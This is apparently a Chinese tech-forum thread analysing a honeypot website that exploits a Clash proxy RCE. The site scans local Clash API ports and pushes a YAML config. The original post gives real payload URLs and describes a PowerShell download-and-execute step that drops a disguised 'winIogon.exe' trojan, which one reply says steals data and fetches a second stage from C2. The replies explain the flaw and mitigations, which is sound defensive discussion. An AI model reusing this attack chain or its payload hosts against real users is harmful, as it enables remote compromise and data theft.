这是一个创建于 62 天前的主题,其中的信息可能已经有所发展或是发生改变。
国护已经完成,期间朋友分享了个很骚的网站,该站的蓝队人员把 Clash RCE 运用到了实战里
RT ,访问该网站,会自动枚举 Clash 常见端口 + 4170x 端口,然后调用 Clash API 下发 yaml
Link
Javascript
还做了系统版本判断,Victim 有 Win 有 Mac
Yaml 文件
let yaml_path = { "win": "http://60.29.77.223:8080/05260CAD5B9562AEA0AAC8039A3AD3987E8E5E42330C39421B5F2D8D9B7880A806755F53968F788FF311B9A772", "mac": "http://60.29.77.223:8080/385A4D8141A3E7951E5DCFF35A11387BA4B79B23970EF6954CD8F5CFF75B5E463662978C95EF1B2D2868232F60", } 这里以 windows 为例子,会执行 Powershell Invoke-RestMehod 方法下载 exe 存到C:\Users\Public\winIogon.exe 并且执行 winIogon.exe
木马分析
微步
做了基础的一些沙箱检测,木马行为就单纯的执行 shellcode ,非注入
更深入的分析 IDA 什么的,楼主就不会了 TAT
 | 1 AEnjoyable 62 天前 via Android 我有点好奇 现在 Chrome 和 edge 对 HTTPS 站点(你给出的这个网站)请求 http ( clash API endpoint )都是默认拒绝的,能生效吗 |
 | 2 kuanat 62 天前 现在 chrome/firefox 应该都会默认阻止对 localhost 端口的非直接访问,这个第一步应该就执行不下去。 |
 | 4 lovekernel 62 天前 就是以后访问装陷阱的网站,该网站会自动进行端口扫描,然后利用 Clash RCE 下载 winIogon.exe 到本机运行?这么恐怖吗? |
 | 5 cwxiaos 61 天前 via iPhone 好像老早就端口要求设密码了 |
 | 6 NGGTI PRO 是不是某亭的蜜罐啊,插入 js 的。 |
| 7 NGGTI PRO 这 IP 8080 端口,就是蜜罐了 |
 | 8 codehz 61 天前  1 @AEnjoyable @kuanat 其实是这么个事,localhost/127.0.0.1 被当做安全连接了,所以不会有 mixed content 错误,本来是一个本地测试方便。。。 之前的那个 Private Network Access 在开了代理之后也会失效(不过 PNA 早就自己退役了 https://developer.chrome.com/blog/pna-on-hold?hl=zh-cn ) 以及新的对访问私有地址的限制还在草案阶段 ( https://github.com/WICG/local-network-access?tab=readme-ov-file |
 | 9 crackidz 61 天前 这个很早之前就反馈过了,官方认定就是不改 |
 | 10 restkhz 61 天前 正好最近搞了个这个: https://github.com/restkhz/CutterMCP-plus 对这个马做了一个简单静态逆向,这个马功能没那么简单。但他调试符号没有剥掉... 这马偷很多信息啊,而后从 c2 下载另一个马再执行。 |
 | 11 deepbytes 61 天前 via iPhone cool ,最近刚要被派出去某金融机构做重保,marked ,看有没有收获 |
 | 13 doco 61 天前 点进楼主的链接会有危险吗? 刚点进去看了下那个 vue.js |
 | 14 huangxiao123 OP @NGGTI #6 不知道是不是亭的西 XD |
| 15 huangxiao123 OP @doco #13 看 JS 什麽,但是那站,如果你的 Clash 在漏洞面那 GG |
| 16 huangxiao123 OP @cwxiaos #5 是,但是是有人用著 Outdated 的 Shit |
 | 17 whoami9894 61 天前 用 N-day 做蜜罐反制在几年前就是常规操作了,甚至用 0-day 的也有。很多攻击队会用一台干净新设备专门打国护,或者在虚拟机里操作,就是怕被溯源 |
 | 18 miniliuke 61 天前 不太明白,js 访问 127.0.0.1 不会触发浏览器的跨站吗? |
 | 19 NotLongNil 61 天前 flclash 有个“外部控制器”的开关。关闭了,是否就安全了?  |
 | 20 metalvest 61 天前 via Android @NotLongNil mac 本来就不受影响吧 |
 | 22 sky96111 61 天前 via Android 1 @NotLongNil 是的。如果是 clash verge rev ,用新的 unix domain socket 方案也是安全的 |
 | 23 chitaotao 61 天前 via Android ublock origin 有一个 Block Outsider Intrusion into LAN 规则,可以屏蔽对本地网络的访问; jshelter 也有屏蔽本地网络访问的选项 |
 | 24 lymanbernadette6 61 天前 emmm controller 有密码基本就没事 建议还是去掉超链接或者标记危险。。 |
| 25 NGGTI PRO @whoami9894 老操作了,几年前就那 sxf vpn 的洞来做反制。 |
 | 26 150530 61 天前 不会跨域吗? |
| 27 kuanat 61 天前 @codehz #8 感谢解释。 我这边检查了一下,是我之前拦截了对 localhost 的访问,我还以为之前的 PNA 通过了呢。 我又回头确认了一遍,RCE 是两部分共同实现的,通过 api 控制是 POST/json ,本身是需要跨域的,但 clash 默认允许……第二个漏洞是配置项在 unmarshalling 的时候,解析的路径没有检查就直接使用,所以可以下载任意文件并执行。 |
 | 28 gksec 51 天前 几年前的东西了,国内头部蜜罐厂商的东西 |
Select Language